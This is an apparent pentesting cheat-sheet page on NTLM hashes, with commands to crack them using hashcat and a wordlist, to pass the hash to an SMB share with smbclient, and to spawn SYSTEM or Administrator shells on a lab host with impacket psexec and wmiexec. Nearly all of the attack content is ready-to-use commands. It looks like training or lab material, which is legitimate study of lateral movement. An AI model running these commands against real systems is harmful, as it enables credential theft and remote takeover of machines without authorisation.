Crack or Pass NTLM hashes

All of this is done from Kali. This requires to have a NTLM hash in our possession.

Crack

hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

We can't crack the Administrator hash we obtained. However we can just pass it along with the corresponding username to authenticate. This is possible because NTLM passwords are not salted.

smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

We're now able to access the share.

Pass-The-Hash execute command / get shell

Pass-the-hash requires SMB and Printer Sharing feature to be enabled (common). Also 88% sure our user also must be local admin on the target

This will spawn a cmd (aka we get a shell) as NT SYSTEM

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

(Keep the 32 0s and put the hash after the semicolon).

We could also add a specific command at the end if we want something else than a shell.

Shell as Administrator user

If for some reason we don't want a shell as NT SYTEM but actually as the Administrator user, we can use this instead:

impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

PreviousDump NTLM Hashes from Memory NextAbuse Net-NTLMv2 Protocol (Crack or Relay)

Last updated 2 years ago

Crack

Pass-The-Hash to access SMB share

Pass-The-Hash execute command / get shell

Shell as Administrator user